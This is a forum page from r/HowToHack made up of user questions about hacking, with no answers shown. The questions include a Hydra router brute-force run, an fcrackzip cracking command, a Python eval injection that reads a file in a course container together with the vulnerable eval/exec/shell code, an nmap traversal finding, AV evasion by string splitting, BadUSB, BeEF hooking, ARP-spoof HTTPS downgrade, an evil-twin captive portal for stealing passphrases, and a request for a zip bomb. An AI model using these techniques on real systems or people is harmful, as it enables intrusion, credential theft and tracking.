/r/HowToHack
Welcome! This is your open hacker community designed to help you on the journey from neophyte to veteran in the world of underground skillsets. Ask, Answer, Learn.
Visit us on discord
http://iso.linuxquestions.org/
We teach you how to do it, use it at your own risk.
/r/HowToHack
I am looking for an open source script to make a bad USB. I would much prefer it be based on an Arduino as I am much more comfortable with Arduinos language than Python but I'll take what I can get.
I want to make a USB that when plugged in will run the payload script then function normally as a mass storage device. I found a GitHub for a raspberry pic that kind of did that but required connecting two pins in order to change the mode. I am ok with modifing code but I don't wanna rewrite the whole thing.
Was thinking Arduino Leonardo was the way to go hardware wise but I'm not set on that.
Hello, I'm trying to brute force my router with the correct password contained within a text file. However, Hydra keeps returning that all passwords from the file are correct. Where am I going wrong?
Terminal:
┌──(root㉿localhost)-[/home/kali] └─# hydra -l admin -P passwords.txt 192.168.1.1 http-get /login.php
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-09 19:04:08 [DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:7), ~1 try per task [DATA] attacking http-get://192.168.1.1:80/login.php [80][http-get] host: 192.168.1.1 login: admin password: password [80][http-get] host: 192.168.1.1 login: admin password: admin [80][http-get] host: 192.168.1.1 login: admin password: user [80][http-get] host: 192.168.1.1 login: admin password: 1234 [80][http-get] host: 192.168.1.1 login: admin password: qwerty1234 [80][http-get] host: 192.168.1.1 login: admin password: nekasifra [80][http-get] host: 192.168.1.1 login: admin password: ztonpk 1 of 1 target successfully completed, 7 valid passwords found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-09 19:04:08
┌──(root㉿localhost)-[/home/kali] └─# cat passwords.txt password admin user 1234 qwerty1234 ztonpk nekasifra
┌──(root㉿localhost)-[/home/kali] └─#
I can’t find anything on it. I was watching a video about how a new ransomware gang was hiding malicious code in regular files through alternate data streams; then extracting this through a malicious .lnk
Hey, I was just curious if an attacker can spoof a public IP address and then try sending it a malformed packet from the spoofed IP address. If yes, how?
Hello!
Posting here as my submission has been removed from r/hacking
I am doing a presentation on wireless hacking soon. I will be cracking the password on my phone's hotspot for the demo. I am able to consistently capture the WPA 4 way handshakes (with the help of an audience member connecting to the hotspot) and crack them but I am very rarely able to capture PMKID of the hotspot. I remember doing it before but I might be wrong because I'm not sure if hotspots even have roaming capabilities/the usage of PMKID. If anyone has any ideas I'd love to hear them!
So this maybe a stupid question - but I'm starting to learn external pentesting. I host my own dedicated gaming server (Palworld & Enshrouded) at my house, and I have a handful of portfrowards punched through the firewall. I have, what I feel, a very safe dedicated server as I've hardened Windows quite a bit, have VLANs & ACLs set, have IPS enabled, and have Wazuh monitoring the server.
However, I'd like to try attempting to break into the server from the outside.
If I join my Kali machine to my cell hotspot, and run an aggressive nmap scan against my public IP, do I need to worry about my ISP on either ends? They won't like down my internet for a certain time period will they?
Unable to negotiate with ... port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
Please I've been battling with this error on my kali for longer than usual
For a assignment at uni i need to find some vulnerability in any two popular websites, can someone sugget some popular websites that might be vulnerable to popular attacks. And recommend some tools that i can use for finding the vulnerabilities
My zoom g1on pedal is bricked, this is my favorite and usefully and I need to use in my next event. I saw that with C341A device and BIOS I can rewrite, but I don't find the file. I tried extract from firmware.exe, but unsuccessful. Can anyone help me?
I genuinely have 0 clue where to start, I’ve done IL2CPP hacking at a beginner level with standard Windows games but I have never tampered with browser games. From what I know I can use JavaScript to interact with different Unity Objects, but I am not exactly sure how to and where to learn to. Any leads or anything that can help me out a bit?
So I sometimes watch anti-virus videos when I'm bored and there's something that I've never understood about how they work.
A criminal might store a malicious command in a variable (ex: blabla = "command to connect to malicious ip". However, anti-viruses will see that variable and detect that the variable is a malicious command and will label the program as malware.
What cyber-criminals do instead is splitting and scattering the command accross different variables (ex: the word "Download" and the word "String" might be stored in 2 different variables, but then joined together and then ran as a command).
Obviously, since the anti-virus sees the variable "Download" and the variable "String" instead of "DownloadString" then it thinks that theres no threat. Up to that point, I understand.
However, the cyber-criminal still needs to join those two words to then run the full command. So how does the antivirus not detect (at the point in the code where the 2 variables are joined before being ran as a command) the program as malicious?
ex:
part1 = "Download" // anti-virus: its safe
part2 = "String" // anti-virus: its safe
run_command(part1 + part2) // anti-virus: wait, its trying to run "DownloadString", thats bad!!
What am I missing? If the anti-virus gets bypassed with that then its dumb. but if the anti-virus doesnt get bypassed with that then whats the point of them trying to hide the command? Or am I just wrong in my understanding of how anti-viruses work?
I am debating between using Tails USB or Whonix on VM with full disk encryption. The tails USB I can remove whenever I am done using it and clear my RAM so I am leaning towards that. I am planning on using public WiFi and not logging into any social media. How hard would it be to track me and possibly find out who I am or my location? Do tails and whonix spoof mac address? How could I clear all the data stored? Do I need to take any extra precautions like external wifi? Thank you for tips or advice.
Where should i begin and what languages would i need to use?
I already know of the infamous 42 .zip, but I’ve seen shitposts of people claiming to have zip bombs that extract to 55 yottabytes and even up to 195 yottabytes (though I think this one was a fake/parody of the 55 yottabytes one) but don’t have any source of where the download is which makes sense. Basically I’m looking for a maximally destructive zip bomb (preferably at least a yottabyte) because I am simply bored.
Hello, currently taking part in a cyber security contest and i cant seem to figure out this encrypted meassage.
GzI2MKVtLKWaqJHtq2y0nPO0nTHtMTS0LF4X
The clue for the meassage is "every symbol has a meaning, can you figure it out?"
80/tcp open http
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: UNKNOWN (unable to test)
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $_redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd :
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
| http://www.exploit-db.com/exploits/1244/
i recently did a nmap scan on a host i had on my old webserver(it was in backyard, got it out recently while cleaning, i haven't updated it in a while ik), can anyone explain this vulnerability to me? is there any way this can be exploited? i really wanna try exploit it myself.
every couple of weeks (sometimes multiple times per week) for the past 3 years someone makes an account on instagram/it’s multiple people honestly and try dming me. i usually ignore them but sometimes they can get very rude or just outright spam the hell out of me. it’s gotten better as you have to accept people for them to send more than one message now but it still gets on my nerves sometimes. they use to go as far as calling me multiple times to try to get me to reply. it’s been years and I wanted to know is there anyway to find out who they are. I don’t want to get into the account or see who else harass. I just want to know who the individuals harassing me the past three years are. idk if anybody has an answer tbh but please help me if you can.
I saw this app on google store called hacker x so i just want to ask if it is useful or just bullshit
Hellou again, thanks for kind and helpful advices in the past. Coming here with yet another question, I was playing with beef a little and found out that if I want to hook browsers outside of my network I would have to create a cloud. So I did just that, created a Lindo, followed every single step succesefully, waited for an hour for beef to install...And when it was the time for me to run a command cat /root/beef.info it says that it does not exist.Keep in mind that I already accessed it in my terminal via Ssh key auth..Any help?
P.s I ve searched like everywheeere and no sings of it I did not just stop at root or /etc
i am a person that is new to hacking and i wanna buy some gadgets and i have some trouble i wanna buy something called a wifi nugget and a usb nugget but they both the same besides the name what is the difference between them and if there the same which one should i get?
In the knowledge I got, I run the arp spoof with bettercap and hstshijack to downgrade de HTTPS Pages to HTTP and inject the Beef Payload (or any JS Code) to run in the client machine. But on my pratice, It seem to be deprecated and the Pages continue in HTTPS. I tried to use SSL Strip but got no sucess. How did This hack runs nowadays? Can anyone help me?
I'm guessing this is relatively feasible with 1million possible combinations, is there any software out there that can work with those parameters (i.e. only try 6 digit numerical passwords)?
EDIT: Got this done with fcrackzip!
fcrackzip -b -c '1' -l 6-6 -u <file path>
I will post the original version and the encrypted one. These are for a game silkroad I just want to understand what the encryption method is. The one encrypted could be a little bit different but it's mostly the same as the encrypted one.
https://drive.google.com/file/d/1fZberoXiCyOPsc2hZD6w9Ne9mzd95Wu\_/view?usp=sharing, https://drive.google.com/file/d/1qmV8zDfb4tDy4CKEc0fruGon3hApIW5w/view?usp=sharing
i know there are groups like anonymous and stuff but how do you get into those groups and how do you find different hacker groups?
What OS is best for running on older 32 bit desktop? I want to do so much but am unsure where to start …
IF you learn how to exploit a specific vulnerability of the system,master it, try it into production, than next day it is patched, retry to rediscover a vulnerability, exploit it, and again it is patched...
How you can keep up with learning how to break things and penetrate them while those are getting fixed and what did you learned is deprecated and useless?
Not only this, but any free and easy to find tutorials has ONLY academic examples, which most of them are useless in work field, presenting already patched vulnerabilities and what vulnerability is not so old , it is ONLY presented in a pseudo manner where it is specified what is it, how it works, "update your system as fix"
...
Those things does not makes you to quit the journy since everything learned and used,in one day (even the day after) will be obsolete because it was deployed a fix ?
I saw questions about "how to" and" why to" , but nothing about the frustration factor of finding and exploiting a vulnerability and its ways of exploiting that vulnerability
I'm interested to find out if two mobile phone numbers are connected to the same base-station(or in the same location).
Do you have any ideas?
Could silent SMS help out? I tried to find something around the RTT(round trip time)/delivery time comparing, but nothing came up.
Hello folks: hackers and pentesters; coders and programmers; developpers…crackers…cyber attackers… I don't know half of you half as well as I should like; and I like less than half of you half as well as you deserve. I’ve been using airgeddon for quite some time now and am enjoying it however i faced an issue lately which doesn’t seem to be a bug, but the way how captive portals work. I created an AP with captive portals in airgeddon (option 9) I got my victim to access my rogue ap but entered an incorrect code and now my ap name is registered in his device. So, whenever I lunch my attack, the victim logs automatically to my ap without seeing the captive portal in which he can write the passphrase since my ap name is already registered in his device! My questions are: Is there a way to REGENERATE the captive portal using airgeddon or other tools? Is there a way create an ap with a custom name in airgeddon ? Note: my inquiry is for educational purpose only
For an ethical hacking course i got provided a docker container, to which i have access and can see the backend code
its a http server with 5 quests, the whole point is to be able to bypass the function and be able to read the treasure1.txt that is next to it in the backend
if someone could help me with the input to give for others it would be highly appreciated
function1, python based [solved]:
calculator, you have 2 textboxes, the values of both will be added up and returned
solved, i gave __import__('os').popen('cat treasure1.txt').read() in both boxes and got the readed output back
for the other functions im stuck
function2, python based
there is 1 textbox, the backend converts the text to uppercase characters and returns the output
the code:
elif self.path in [ "/issue2.cgi" ]:
wrd = b' '.join(postvars.get(b'wrd', [])).decode('ascii')
cmd = f"'{wrd}'.upper()"
f = io.StringIO()
with contextlib.redirect_stdout(f):
res = eval(cmd)
function3, python based
there is 2 boxes, the first one is a textbox and the other one a digit number, lets say i give "aap" and in the other box "3" -> it will return "aap aap aap"
the code:
elif self.path in [ "/issue3.cgi" ]:
fct1 = b' '.join(postvars.get(b'fct1', [])).decode('ascii')
fct2 = b' '.join(postvars.get(b'fct2', [])).decode('ascii')
cmd = f"print('{fct1}' * {fct2})"
logging.debug(f"do_POST: post={self.path} cmd={cmd}")
f = io.StringIO()
with contextlib.redirect_stdout(f):
res = exec(cmd)
function4, shell based
same like function2 it returns the sum of 2 numbers, you have 2 textboxes, but now the sum gets calculated via shell
the code:
elif self.path in [ "/issue4.cgi" ]:
fct1 = b' '.join(postvars.get(b'fct1', [])).decode('ascii')
fct2 = b' '.join(postvars.get(b'fct2', [])).decode('ascii')
cmd = f"/usr/bin/expr {fct1} + {fct2}"
logging.debug(f"do_POST: post={self.path} cmd={cmd}")
with subprocess.Popen([ '/bin/sh', '-c', cmd ], bufsize=4096,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
lines = [ line.decode('ascii').strip() for line in p.stdout ]
function5, shell based
you can execute shell commands like "ls -l treasure1.txt" but it does not allow directly the "cat" command
elif self.path in [ "/issue5.cgi" ]:
cmd = b' '.join(postvars.get(b'cmd', [])).decode('ascii')
logging.debug(f"do_POST: post={self.path} cmd={cmd}")
with subprocess.Popen([ '/bin/sh', '-c', cmd ], bufsize=4096,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
lines = [ line.decode('ascii').strip() for line in p.stdout ]
help is appreciated
I know this is most definitely unethical, but where should one start if one wanted to learn making game cheats. I'm not talking about making game cheats for big games stuff like Call of Duty or whatnot, just basic mobile games. I know i should learn lua but other than that i have no other clue. anyone who can help?